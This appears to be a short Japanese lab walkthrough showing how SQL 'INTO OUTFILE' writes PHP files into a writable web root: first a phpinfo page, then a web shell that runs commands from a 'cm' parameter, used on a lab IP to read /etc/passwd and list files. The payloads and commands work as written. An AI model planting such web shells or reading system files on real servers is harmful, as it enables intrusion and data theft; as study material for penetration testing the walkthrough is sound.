Hello there, ('ω')ノ

 

あらかじめ下記のディレクトリが書き込み可能であることが前提でして。

　/ var / www

 

そこにSQLでファイルを作成するSQL文を設定して。

　set SQL "select \"<?php phpinfo()?>\" INTO OUTFILE \"/var/www/a.php\""

 

 

ファイルができていることと中身を確認しておいて。

 

 

ブラウザでファイルへアクセスするとファイルに書き込んだモジュールが実行されて。

 

 

今度は、cmパラメータにシステムコマンドを受け取って。

PHPのシステム関数で実行できるファイルを作成することに。

　set SQL "select \"<?php system($_GET[cm]);?>\" INTO OUTFILE \"/var/www/b.php\""

 

 

下記のようにシステムコマンドをパラメータとしてb.phpファイルに指定すると。

　http://10.4.131.3/b.php?cm=cat  /etc/passwd

 

/ etc / passwdファイルの内容が画面に出力され。

リモートコードが実行されたことが確認できて。

 

 

ならば、こんなことも。
　http://10.4.131.3/b.php?cm=ls

 

 

Best regards, (^^ゞ